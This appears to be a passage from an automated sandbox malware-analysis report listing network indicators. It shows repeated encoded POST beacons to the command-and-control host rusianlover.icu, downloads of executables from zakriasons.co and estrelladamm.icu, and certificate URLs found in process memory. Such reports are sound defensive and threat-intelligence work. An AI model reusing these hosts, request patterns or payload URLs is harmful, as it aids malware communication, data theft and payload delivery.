34 37 32 34 44 44 32 32 34 33 31 36 30 39 42 41 44 39 34 42 30 30 46 44 41 33 33 38 36 36 41 35 45 46 41 35 43 39 45 38 35 33 35 44 34 34 32 31 35 33 42 42 36 31 46 36 34 31 46 36 44 46 32 44 38 31 38 42 44 31 31 41 33 44 43 43 45 31 41 34 34 42 32 39 39 37 35 30 41 45 45 36 39 46 41 36 41 39 31 34 32 30 39 39 32 41 Data Ascii: myqc=0ea1deab7ce4bf29151e3c57d34a4fef309144580b0d5dc18b74a1&kukukuku=80444974&ocwkes=B3F895592AD401C1AD88EE4BE60F100FEC5F60408A116DE3E21DF769E4C7A63CA6D89D950B23097AED6484B498CEEFE1654727906BC47112D7FC5F10E3E7AEE9243B3B5C4BAE99974ADC1164320BC9A58E1DE7789A66FF22E2111E199FB2B3A0069215CC1C43C10F22FCC726C390C3D65AF6F72FD3B1573B95490D07C705DFE8B08DEFF2D1C919EB1D3D44CF8811E1B192235CAE7875DF3BA45405CCFF93238D087660A7FD40E8DC6A31D3912CDBF728FE0EDC787FA493F881F4993A1F1D54DB65366FCD62B384522966E40371DCB1D455B73FF4696C5697EF2964DD3B6C62E09A61B74130DC0A5EED8EA4333389374724DD22431609BAD94B00FDA33866A5EFA5C9E8535D442153BB61F641F6DF2D818BD11A3DCCE1A44B299750AEE69FA6A91420992A
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?pid=438 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 665Cache-Control: no-cacheData Raw: 6b 75 65 6f 79 69 73 63 3d 45 38 31 41 32 38 46 39 43 45 31 38 46 34 31 32 37 42 39 43 39 41 45 34 39 42 36 44 32 37 35 45 33 35 35 36 41 39 32 45 35 41 38 35 43 42 41 42 43 33 26 69 71 79 67 6f 77 3d 37 36 37 38 32 32 34 32 26 6d 79 6b 77 3d 32 34 35 44 30 46 45 38 31 36 34 35 46 44 46 44 39 44 46 44 30 33 46 33 34 44 43 44 41 37 41 43 38 46 46 30 33 30 33 37 46 37 32 41 37 45 31 33 41 41 35 35 35 37 45 35 33 31 35 30 33 30 34 46 45 32 30 42 43 34 37 31 31 31 43 32 30 33 37 36 30 37 41 44 32 38 37 46 33 41 33 41 39 39 42 44 43 33 39 33 30 37 45 46 31 46 46 34 39 38 44 39 34 34 33 36 43 38 37 44 35 34 34 42 46 46 33 45 38 36 39 35 45 44 36 38 32 44 45 43 38 37 45 31 45 31 46 35 38 44 41 33 41 41 35 34 33 45 43 37 37 42 36 31 31 32 33 46 34 32 30 46 37 39 39 37 34 35 41 38 46 35 31 35 30 30 43 31 39 42 38 42 44 44 33 32 39 33 32 43 45 36 45 32 43 31 30 41 45 34 37 33 37 39 38 45 41 35 35 32 46 44 41 42 44 33 38 39 43 44 37 34 34 32 37 30 34 42 41 45 37 42 42 31 45 34 46 42 33 32 41 37 32 43 43 30 46 46 37 39 34 30 38 39 45 44 39 42 33 31 30 39 44 30 41 42 36 32 33 45 34 36 44 34 32 38 44 38 36 45 32 30 31 32 44 32 43 38 45 34 37 34 35 30 30 30 44 43 34 43 42 31 39 39 36 39 30 32 41 34 34 37 36 41 35 31 31 31 34 43 39 36 34 36 43 36 38 30 38 46 46 35 45 31 42 31 43 44 33 42 38 42 41 41 37 41 31 42 44 33 32 43 31 45 31 42 39 43 36 36 39 32 44 31 32 38 33 39 45 34 33 39 45 41 45 38 33 33 46 30 45 35 36 45 46 31 39 42 33 38 46 34 46 45 46 34 38 35 32 38 43 30 41 31 37 33 41 30 35 44 42 35 41 32 45 32 39 34 38 44 36 36 33 35 34 33 31 30 38 46 31 31 39 41 36 34 41 39 41 32 32 43 34 37 36 44 42 44 45 46 46 43 30 39 36 32 39 46 45 43 41 33 46 39 44 43 45 38 34 34 41 44 32 
46 33 44 33 46 38 37 45 35 35 37 35 43 38 43 42 33 33 35 45 43 43 31 34 30 38 32 39 46 31 35 35 31 41 44 46 44 42 37 42 31 35 31 41 42 39 44 30 34 32 36 34 30 39 33 30 46 38 35 35 44 35 37 30 35 44 37 31 30 36 44 39 44 32 31 30 33 44 41 38 42 33 32 45 31 37 39 31 39 32 36 41 39 30 42 34 44 39 34 37 33 Data Ascii: kueoyisc=E81A28F9CE18F4127B9C9AE49B6D275E3556A92E5A85CBABC3&iqygow=76782242&mykw[...]
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 667Cache-Control: no-cacheData Raw: 75 75 6f 6f 69 69 3d 35 38 44 34 43 39 33 36 39 34 32 38 37 46 34 30 46 32 46 30 46 37 44 46 35 39 41 43 30 41 33 41 41 41 41 46 36 45 38 41 35 33 44 45 37 32 34 41 41 31 42 37 26 73 71 69 67 3d 32 30 38 32 33 35 32 38 26 77 79 75 77 73 75 77 73 3d 36 61 61 37 37 33 64 37 39 62 38 66 61 31 64 34 62 38 64 66 31 35 63 34 63 31 38 63 32 66 30 38 63 36 31 65 36 38 32 39 66 37 33 35 62 63 65 63 34 39 38 34 32 63 36 36 35 66 37 35 36 65 64 31 32 64 32 31 38 35 65 61 65 31 64 32 36 62 66 34 34 62 39 32 61 32 32 38 63 33 37 34 31 65 66 39 36 32 31 66 37 65 63 66 65 61 34 31 64 35 35 32 39 32 32 31 63 37 37 32 37 34 61 61 30 31 34 39 38 36 65 39 39 30 61 36 36 30 39 32 61 32 36 34 31 61 65 65 62 65 39 38 31 39 37 34 39 35 38 31 38 32 30 33 36 33 66 30 66 39 38 37 66 36 62 61 64 38 66 39 37 36 38 39 39 61 36 38 62 35 63 30 34 34 31 39 31 61 36 36 31 35 63 34 62 36 35 39 63 37 33 61 36 39 66 33 35 34 38 36 38 30 30 35 62 37 36 31 38 39 31 39 38 66 64 61 34 33 32 34 36 63 62 63 63 65 39 39 39 37 62 34 38 32 66 64 35 37 37 30 34 31 31 66 38 64 62 33 61 34 33 63 61 66 38 37 66 32 63 30 63 32 31 64 33 66 61 66 66 38 65 65 32 31 62 62 65 33 62 38 39 34 32 36 64 37 31 61 64 30 62 31 35 63 32 61 39 37 31 33 37 39 35 63 38 37 31 34 65 39 34 63 33 36 32 39 38 64 66 36 66 66 33 64 34 35 64 32 34 32 35 35 38 31 39 34 35 61 30 38 33 66 37 62 38 36 34 37 39 65 65 30 33 31 38 61 35 66 30 63 38 30 39 61 30 36 62 38 31 63 66 37 65 32 63 66 37 62 61 38 39 39 64 64 65 63 31 35 34 61 38 37 33 62 66 62 64 62 63 39 64 37 66 63 36 36 63 31 34 32 36 63 64 33 39 33 31 36 62 34 39 38 39 37 33 64 32 34 37 33 32 35 63 31 33 36 65 39 31 36 39 38 31 63 39 31 63 39 30 33 65 37 61 39 62 64 30 36 31 32 62 33 36 30 
36 35 36 32 31 65 65 33 36 31 39 39 65 33 34 39 65 61 61 34 35 31 65 37 63 39 66 39 65 34 62 62 39 35 38 62 30 39 36 30 61 36 61 61 35 32 39 32 36 30 63 32 31 64 65 64 66 32 66 61 61 35 31 39 38 39 64 35 30 65 38 65 37 35 66 33 38 36 63 36 62 30 39 65 30 65 38 31 36 32 38 61 37 32 33 33 64 64 30 65 Data Ascii: uuooii=58D4C93694287F40F2F0F7DF59AC0A3AAAAF6E8A53DE724AA1B7&sqig=20823528&wyuwsuws=6aa773d79b8fa1d4b8df15c4c18c2f08c61e6829f735bcec49842c665f756ed12d2185eae1d26bf44b92a228c3741ef9621f7ecfea41d5529221c77274aa014986e990a66092a2641aeebe9819749581820363f0f987f6bad8f976899a68b5c044191a6615c4b659c73a69f354868005b76189198fda43246cbcce9997b482fd5770411f8db3a43caf87f2c0c21d3faff8ee21bbe3b89426d71ad0b15c2a9713795c8714e94c36298df6ff3d45d2425581945a083f7b86479ee0318a5f0c809a06b81cf7e2cf7ba899ddec154a873bfbdbc9d7fc66c1426cd39316b498973d247325c136e916981c91c903e7a9bd0612b36065621ee36199e349eaa451e7c9f9e4bb958b0960a6aa529260c21dedf2faa51989d50e8e75f386c6b09e0e81628a7233dd0e
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?pid=925 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 663Cache-Control: no-cacheData Raw: 61 67 6d 6d 73 79 79 65 3d 41 31 43 32 45 35 46 34 39 33 38 32 42 32 45 33 36 32 35 37 35 32 39 41 30 34 36 39 39 43 36 36 33 35 45 33 42 41 46 41 44 41 41 32 33 45 38 41 26 79 63 67 65 69 6d 3d 38 38 35 33 34 31 30 36 26 63 6b 73 75 3d 63 35 38 62 66 38 31 66 61 36 33 36 38 35 66 37 62 61 38 38 64 34 34 35 33 34 31 34 65 62 30 35 34 31 36 39 65 66 61 66 65 36 63 30 62 31 37 32 65 61 62 63 35 33 65 37 39 65 64 62 63 62 34 31 61 38 64 30 34 30 30 62 32 62 31 38 32 38 39 34 32 63 61 31 34 32 64 66 61 38 65 34 36 61 62 30 63 30 32 37 30 63 38 63 63 34 36 62 66 30 31 33 63 63 35 39 36 39 37 64 62 32 30 62 39 65 64 35 31 30 33 33 35 33 38 61 36 38 66 37 66 34 31 38 62 34 38 31 33 32 36 35 64 33 30 32 63 33 32 34 33 33 63 31 63 35 62 33 35 66 36 39 39 34 36 33 39 36 38 38 66 62 37 36 66 64 34 63 31 38 63 39 38 36 63 61 31 37 61 32 30 38 39 32 34 31 34 66 35 37 37 31 63 61 64 62 38 37 63 37 34 39 35 64 37 65 36 32 65 34 62 32 34 64 63 65 37 33 34 64 62 61 33 33 30 30 36 62 65 34 61 64 30 39 30 64 32 38 35 35 38 62 63 63 32 65 35 31 32 38 31 32 35 32 35 64 63 66 34 38 33 31 37 39 32 61 33 62 62 32 63 62 33 39 35 34 62 35 35 37 38 64 32 61 35 38 30 66 31 65 39 63 62 39 33 38 38 64 31 33 39 32 38 33 63 33 33 33 66 39 36 30 62 33 39 37 31 65 64 35 39 33 30 38 61 66 64 61 62 34 30 39 32 30 31 61 34 62 30 39 34 38 33 64 31 64 31 31 30 38 65 61 30 33 36 35 34 65 62 65 30 35 39 65 37 32 62 32 37 30 38 33 30 39 61 62 32 32 38 35 64 33 38 39 39 38 64 66 36 63 31 38 66 37 39 32 36 35 34 31 65 39 64 61 61 66 65 30 33 31 34 35 30 30 66 64 62 32 36 65 62 36 32 34 62 65 30 31 30 32 65 32 64 61 38 66 37 37 62 31 33 39 37 30 32 36 30 36 36 32 64 61 62 36 37 30 63 34 35 31 33 39 62 36 31 
65 34 30 65 39 66 64 34 30 30 36 62 38 38 34 39 39 39 61 63 64 39 36 66 35 66 38 61 31 65 63 39 65 65 38 33 33 33 65 37 62 35 31 66 32 33 61 30 63 65 32 31 35 38 35 63 32 65 66 62 37 37 64 65 66 34 38 65 30 31 33 64 61 65 37 35 33 37 37 63 32 33 62 62 63 38 37 31 35 32 64 66 38 64 30 35 38 30 38 Data Ascii: agmmsyye=A1C2E5F49382B2E36257529A04699C6635E3BAFADAA23E8A&ycgeim=88534106&cksu=[...]
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 648Cache-Control: no-cacheData Raw: 74 73 72 6b 6a 69 68 61 7a 3d 31 36 35 34 36 33 36 31 26 76 77 78 73 74 3d 45 31 34 35 35 41 32 33 39 37 37 42 37 38 35 41 31 35 41 35 36 44 37 44 35 35 41 34 33 46 26 78 61 64 61 64 67 6a 3d 41 30 42 45 35 34 36 46 31 33 46 43 45 46 46 37 39 38 38 30 38 46 44 37 37 43 35 33 45 34 37 37 30 30 46 42 32 30 43 36 32 34 39 37 35 31 32 31 32 33 34 33 39 33 32 34 39 31 39 39 30 43 41 43 31 44 33 36 42 45 36 39 37 38 35 42 32 36 44 33 41 34 36 41 43 41 31 30 44 36 31 42 37 35 32 44 41 34 45 33 38 37 34 43 46 34 39 33 35 45 32 39 41 31 37 33 30 42 41 31 33 39 37 33 38 41 33 33 43 31 38 30 41 36 34 37 45 39 31 42 33 39 37 38 30 38 39 41 41 44 46 43 42 38 35 35 42 39 41 36 46 37 37 39 35 42 30 37 39 45 36 45 33 38 37 38 38 36 37 43 31 45 30 33 44 30 32 45 30 39 39 35 44 38 44 36 36 35 33 33 36 45 33 41 43 38 36 35 35 43 36 36 44 46 38 43 45 42 41 34 45 33 41 36 35 39 30 44 43 34 42 43 34 36 39 43 36 31 45 37 30 42 42 36 44 42 42 33 43 31 30 41 34 31 46 44 39 31 46 45 34 31 37 45 46 39 41 41 35 46 39 33 30 31 33 39 34 44 32 45 39 46 44 34 43 41 45 34 32 32 39 32 30 32 39 44 38 41 33 45 31 33 33 32 45 36 37 39 46 38 43 45 38 45 36 39 35 30 46 31 31 41 30 33 37 31 38 42 38 37 44 33 38 46 45 41 42 46 46 34 35 43 39 44 37 30 36 30 32 31 33 33 39 44 41 31 44 41 34 34 44 33 31 34 42 43 39 46 41 33 44 35 41 46 39 33 39 42 37 41 30 30 30 42 34 39 39 31 38 34 43 35 33 30 31 31 37 46 31 31 45 33 43 35 44 33 41 46 38 38 37 35 35 31 41 42 41 45 46 33 42 33 39 31 46 32 41 34 36 34 36 42 42 46 32 35 46 30 30 42 31 36 42 32 44 36 35 34 34 45 31 30 33 33 31 30 32 41 35 46 38 45 38 42 45 35 38 35 41 44 39 30 34 30 43 41 33 46 46 33 37 41 41 39 41 33 32 34 38 31 41 34 30 41 36 46 34 34 45 34 39 46 31 
33 39 37 46 39 43 32 45 39 33 30 34 30 45 33 45 33 34 30 39 41 38 42 41 44 46 39 38 32 46 34 45 41 41 36 30 32 35 41 46 39 46 36 34 36 38 38 45 34 38 35 44 42 45 37 37 43 42 46 46 44 30 31 35 43 43 34 35 32 33 35 44 43 44 35 38 33 30 38 34 34 Data Ascii: tsrkjihaz=16546361&vwxst=E1455A23977B785A15A56D7D55A43F&xadadgj=A0BE546F13FCEFF798808FD77C53E47700FB20C6249751212343932491990CAC1D36BE69785B26D3A46ACA10D61B752DA4E3874CF4935E29A1730BA139738A33C180A647E91B3978089AADFCB855B9A6F7795B079E6E3878867C1E03D02E0995D8D665336E3AC8655C66DF8CEBA4E3A6590DC4BC469C61E70BB6DBB3C10A41FD91FE417EF9AA5F9301394D2E9FD4CAE42292029D8A3E1332E679F8CE8E6950F11A03718B87D38FEABFF45C9D706021339DA1DA44D314BC9FA3D5AF939B7A000B499184C530117F11E3C5D3AF887551ABAEF3B391F2A4646BBF25F00B16B2D6544E1033102A5F8E8BE585AD9040CA3FF37AA9A32481A40A6F44E49F1397F9C2E93040E3E3409A8BADF982F4EAA6025AF9F64688E485DBE77CBFFD015CC45235DCD5830844
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 644Cache-Control: no-cacheData Raw: 7a 79 64 63 68 67 66 3d 36 65 64 38 64 39 33 32 37 37 36 30 35 30 32 61 31 31 61 31 33 31 35 61 32 63 26 78 75 78 75 78 3d 34 30 36 35 38 35 34 35 26 62 63 6a 6b 72 73 74 61 62 3d 33 46 36 37 44 37 43 43 38 35 36 36 39 35 42 39 41 32 42 44 31 32 30 44 34 44 31 37 46 38 39 32 30 42 36 30 36 43 34 38 43 32 34 34 46 33 30 36 34 43 31 35 35 38 39 36 39 31 41 42 36 34 31 38 45 37 32 32 41 35 30 33 41 37 34 45 35 30 43 35 44 34 30 43 44 36 34 36 46 33 32 32 36 32 35 34 38 37 32 46 36 33 35 34 32 30 37 41 31 30 42 42 35 46 33 33 44 33 39 45 44 36 42 46 35 43 41 45 33 39 42 32 39 31 35 41 34 37 34 36 38 33 42 36 44 38 42 39 32 35 30 35 39 30 33 30 37 37 42 43 42 31 39 38 44 45 32 46 39 44 41 38 45 32 43 44 42 35 39 31 44 30 33 38 31 44 30 38 36 38 33 41 44 33 41 42 33 46 46 30 30 39 37 31 33 46 35 46 31 36 44 42 44 45 44 37 33 39 46 39 43 30 30 38 30 31 45 39 30 44 34 42 34 33 42 39 43 41 45 42 45 44 43 32 42 31 41 35 33 42 31 34 34 46 42 44 43 43 37 31 33 46 32 30 38 37 34 41 33 46 35 36 42 33 30 43 37 35 34 30 39 39 44 39 36 39 32 46 45 39 35 44 32 37 37 31 30 41 39 35 38 42 41 42 42 37 36 34 44 32 39 45 37 43 46 43 44 32 39 37 35 33 32 33 36 44 31 42 35 30 45 34 44 31 42 34 38 33 45 35 46 30 45 36 36 37 35 37 34 32 30 32 44 31 32 34 38 46 32 35 46 43 34 30 38 39 33 37 33 41 32 37 35 30 30 32 41 32 44 35 42 37 44 32 36 31 38 45 43 43 45 34 44 36 35 41 46 31 38 42 30 41 44 31 39 43 32 35 46 39 45 33 30 31 32 43 46 46 42 30 30 44 31 38 34 38 30 36 46 41 41 34 34 41 30 32 37 44 46 45 44 44 32 38 31 33 35 31 46 35 41 31 38 43 33 37 38 39 39 35 32 34 36 31 35 43 31 36 37 43 32 43 44 31 43 33 33 33 43 38 39 31 39 46 30 35 30 43 36 44 45 38 44 34 41 46 34 30 35 41 33 41 45 35 45 42 41 
44 31 39 31 35 43 44 35 45 45 44 30 42 35 41 46 46 44 36 41 34 33 36 38 37 36 32 35 30 38 46 33 31 45 34 46 43 30 43 46 36 42 38 41 30 38 32 38 33 34 36 44 44 39 46 34 33 34 43 30 36 41 33 39 32 33 37 44 35 43 35 45 31 46 45 31 34 Data Ascii: zydchgf=6ed8d9327760502a11a1315a2c&xuxux=40658545&bcjkrstab=3F67D7CC856695B9A2BD120D4D17F8920B606C48C244F3064C15589691AB6418E722A503A74E50C5D40CD646F3226254872F6354207A10BB5F33D39ED6BF5CAE39B2915A474683B6D8B92505903077BCB198DE2F9DA8E2CDB591D0381D08683AD3AB3FF009713F5F16DBDED739F9C00801E90D4B43B9CAEBEDC2B1A53B144FBDCC713F20874A3F56B30C754099D9692FE95D27710A958BABB764D29E7CFCD29753236D1B50E4D1B483E5F0E667574202D1248F25FC4089373A275002A2D5B7D2618ECCE4D65AF18B0AD19C25F9E3012CFFB00D184806FAA44A027DFEDD281351F5A18C37899524615C167C2CD1C333C8919F050C6DE8D4AF405A3AE5EBAD1915CD5EED0B5AFFD6A4368762508F31E4FC0CF6B8A0828346DD9F434C06A39237D5C5E1FE14
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9557666 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 66 71 62 67 72 3d 41 30 44 36 39 39 38 35 42 44 30 44 39 45 36 44 32 32 43 45 32 43 35 42 46 39 34 42 46 46 41 31 45 36 36 37 46 33 37 46 34 44 37 37 34 41 38 46 38 36 44 35 43 46 26 64 6d 76 79 68 71 7a 63 6c 3d 32 30 30 30 32 34 37 35 26 68 75 68 6f 62 6f 62 3d 62 62 65 37 65 39 66 65 35 38 39 31 30 35 33 30 32 62 34 63 31 39 38 33 33 37 64 37 65 30 64 31 37 63 34 38 39 31 62 34 37 64 61 30 32 38 37 61 30 35 35 38 30 39 35 65 30 38 64 62 65 36 32 36 65 66 31 35 33 37 39 62 39 35 36 30 62 38 32 37 34 30 65 38 39 33 66 31 66 35 66 63 61 39 65 30 64 34 65 64 30 63 62 33 33 31 61 61 62 61 38 37 66 31 63 65 66 35 34 34 64 66 64 32 61 31 62 35 39 61 36 39 63 62 66 61 35 38 39 32 31 33 61 31 31 63 36 31 39 38 36 65 39 34 31 34 32 31 35 33 63 63 39 39 66 63 61 35 64 62 34 34 61 66 34 38 61 65 66 37 65 30 65 30 36 65 34 34 34 37 61 33 33 31 61 37 62 32 30 33 61 38 62 32 33 61 66 35 37 61 35 62 38 38 34 31 62 32 64 63 62 38 37 31 64 37 37 64 65 61 33 61 65 39 34 34 65 66 66 65 39 64 33 32 39 31 32 32 35 63 32 34 39 32 38 35 61 61 33 31 66 62 35 39 66 39 63 39 36 33 36 37 36 37 39 36 33 37 64 65 34 62 39 66 66 30 63 62 34 37 35 66 33 62 35 64 37 36 65 37 61 35 66 31 34 35 64 36 31 30 64 61 61 63 61 35 38 63 37 32 31 36 32 32 33 61 34 64 35 35 64 36 61 36 36 32 38 38 63 34 35 31 61 61 39 37 39 62 37 65 36 61 36 32 36 35 34 39 64 64 31 65 63 62 37 32 34 65 36 62 66 33 66 31 63 31 32 61 38 62 38 34 64 32 66 32 39 62 31 32 31 35 35 61 30 62 38 33 31 32 37 32 31 63 61 61 39 35 37 36 30 66 36 61 32 33 32 61 32 32 30 32 33 37 36 62 63 37 63 65 33 64 66 63 61 63 32 33 64 64 62 35 35 31 62 33 66 33 34 31 64 30 30 66 33 30 65 66 66 65 39 62 36 36 61 35 61 66 31 33 38 35 37 64 65 
33 62 37 39 61 37 37 34 30 32 63 34 38 66 35 65 63 35 61 31 61 31 30 31 63 37 32 39 63 61 63 39 30 61 33 34 36 38 30 34 39 63 61 64 39 35 65 38 35 38 37 35 32 33 32 65 64 34 35 34 35 33 32 65 32 31 30 36 33 65 31 66 64 34 32 33 63 66 33 36 32 39 33 35 39 64 30 65 38 65 65 37 32 66 35 31 32 38 62 65 37 34 61 63 33 62 39 35 35 Data Ascii: fqbgr=A0D69985BD0D9E6D22CE2C5BF94BFFA1E667F37F4D774A8F86D5CF&dmvyhqzcl=20002475&huhobob=[...]
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=2442663 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 659Cache-Control: no-cacheData Raw: 6d 79 6b 77 69 75 67 73 3d 37 34 38 34 37 38 36 36 38 64 34 35 66 66 39 37 38 38 38 38 66 61 61 30 38 34 34 62 63 34 39 65 34 34 62 38 63 38 30 35 64 39 32 63 26 6b 75 65 6f 79 69 3d 31 35 32 36 34 30 36 32 26 6f 63 71 65 3d 33 64 36 34 36 38 34 62 35 66 65 34 66 66 65 65 31 64 61 61 62 36 63 33 63 36 66 39 37 35 65 37 32 61 36 32 31 39 36 34 39 63 34 35 66 33 61 39 39 34 32 63 37 39 34 64 32 32 63 63 35 36 65 33 36 66 61 34 33 61 65 33 32 63 37 36 39 61 32 31 37 39 63 35 33 37 61 31 39 63 63 36 38 62 34 33 64 31 64 38 30 64 63 34 38 33 33 61 65 33 62 32 31 39 39 30 34 39 66 39 31 62 38 66 38 35 65 35 62 35 39 30 34 31 31 63 39 31 62 63 61 62 39 64 38 34 30 63 37 31 34 36 37 66 35 65 66 31 30 39 38 33 39 30 31 33 35 61 63 62 36 31 66 37 31 66 61 36 39 32 62 62 36 37 63 38 62 62 66 33 63 63 37 32 63 37 65 38 37 66 61 64 39 64 36 35 65 34 35 39 36 66 62 63 37 62 38 64 38 37 32 63 66 38 30 63 66 66 63 38 31 65 36 32 65 65 35 35 35 33 66 37 37 61 38 61 62 32 32 33 31 63 35 39 64 37 35 38 39 35 62 31 36 61 31 65 31 64 34 34 38 31 37 36 31 65 63 64 34 35 34 39 37 31 37 61 64 34 62 39 61 36 36 65 31 65 31 37 64 61 30 62 30 65 65 30 37 34 30 65 33 61 38 38 65 30 33 34 32 31 30 61 63 62 30 64 31 33 64 30 36 35 62 62 61 39 35 37 65 37 39 66 37 34 61 63 62 35 38 37 63 63 37 33 32 32 66 65 36 62 62 30 36 33 31 34 38 32 61 32 39 61 34 34 36 61 34 36 65 31 33 64 32 61 66 30 61 38 32 64 31 32 39 63 31 66 35 64 31 34 32 62 61 61 64 38 38 64 31 30 34 65 66 66 66 34 39 35 65 39 39 65 62 38 33 65 39 33 61 35 37 31 31 61 34 38 65 38 65 62 38 65 66 36 34 35 66 65 37 34 63 37 36 30 36 65 31 61 34 65 34 36 35 35 37 36 63 31 37 32 36 30 35 63 31 31 35 62 38 34 62 39 66 65 39 34 63 64 
35 32 65 33 64 33 31 63 36 34 36 36 64 33 64 63 39 30 38 30 36 33 38 66 66 62 30 33 66 30 33 66 66 63 64 66 33 65 37 35 62 35 65 62 30 62 30 30 30 32 37 64 63 30 39 32 34 39 33 65 63 62 66 65 39 61 65 34 62 62 39 37 37 38 64 35 32 35 30 61 61 66 63 36 30 37 39 35 66 31 31 30 31 30 32 39 Data Ascii: mykwiugs=748478668d45ff978888faa0844bc49e44b8c805d92c&kueoyi=15264062&ocqe=[...]
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=7086675 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 633Cache-Control: no-cacheData Raw: 69 77 65 73 67 6f 63 71 3d 38 35 32 38 31 39 33 34 26 6b 61 6b 61 3d 37 33 65 62 32 63 64 65 62 62 63 63 33 36 62 62 30 37 26 6d 65 71 69 61 6d 3d 33 33 31 65 33 65 30 33 37 39 32 35 35 34 31 31 65 31 35 66 66 37 32 30 36 63 66 30 31 37 32 65 39 36 33 39 36 32 37 30 32 35 35 38 36 39 39 34 35 38 33 36 35 31 61 31 30 36 64 31 66 37 61 65 63 38 63 32 61 37 63 34 63 30 38 38 34 35 61 35 37 38 38 33 65 34 31 30 30 32 66 65 61 31 34 35 31 62 36 35 31 62 36 35 31 31 63 35 33 65 66 34 63 61 61 62 33 65 35 33 35 62 34 32 66 31 38 63 37 31 33 65 64 63 36 63 66 62 63 37 64 66 34 65 65 34 64 34 64 34 30 31 64 37 30 35 30 32 31 62 30 61 30 66 31 36 34 66 32 32 62 63 37 35 62 31 37 34 36 64 30 35 35 66 61 63 30 61 38 61 65 61 38 39 63 64 36 36 63 64 36 66 33 32 63 37 38 31 65 65 30 61 34 37 64 36 33 31 65 65 36 35 65 33 64 30 64 39 33 64 31 38 33 30 64 32 61 61 35 34 34 63 61 31 62 64 38 64 64 38 65 63 31 35 34 62 66 36 33 31 63 34 33 32 61 35 34 34 33 30 39 31 35 31 38 35 39 35 64 62 30 30 38 61 38 33 61 64 36 63 63 37 61 61 32 38 31 34 65 64 63 62 32 37 39 36 30 62 61 33 31 36 63 37 63 31 35 36 34 36 39 38 63 63 64 66 63 32 38 37 35 31 35 38 65 64 30 36 66 61 37 39 61 63 37 35 30 66 38 38 32 38 66 32 33 31 66 33 66 35 31 33 64 37 64 33 38 34 35 39 36 35 34 32 65 37 64 65 33 65 61 62 66 61 62 65 66 63 30 38 33 61 35 63 61 39 66 30 35 36 30 33 35 36 63 61 33 61 61 32 32 39 66 30 33 65 31 30 37 32 34 37 34 61 37 61 33 64 61 39 39 37 64 31 63 66 66 62 64 31 35 34 62 39 63 31 38 39 30 35 64 31 37 63 62 36 30 65 64 35 35 39 33 30 34 64 34 38 38 30 32 37 35 63 34 36 31 33 36 37 38 64 34 39 34 61 61 61 38 32 37 65 62 31 63 35 66 31 33 34 62 36 38 32 38 35 61 61 61 63 36 35 31 37 
38 64 39 36 62 63 64 35 39 36 61 38 32 34 31 62 38 32 62 36 36 36 36 33 61 35 33 39 30 66 31 37 32 65 32 62 34 32 38 64 30 61 65 39 35 36 35 38 32 30 63 33 64 37 34 64 32 38 63 37 30 38 63 36 63 39 34 66 61 31 Data Ascii: iwesgocq=85281934&kaka=73eb2cdebbcc36bb07&meqiam=[...]
                      Source: global traffic | HTTP traffic detected: GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: zakriasons.co | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /old/GetDataAVK.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: estrelladamm.icu | Cache-Control: no-cache
                      Source: unknown | DNS traffic detected: queries for: rusianlover.icu
                      Source: unknown | HTTP traffic detected: POST /forum/logout.php?page=7 HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: rusianlover.icu | Content-Length: 1081 | Cache-Control: no-cache
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000025.00000002.358331639.00000248FF464000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000025.00000002.358882072.00000248FF834000.00000004.00000001.sdmp | String found in binary or memory: http://crl.mi
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-G
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
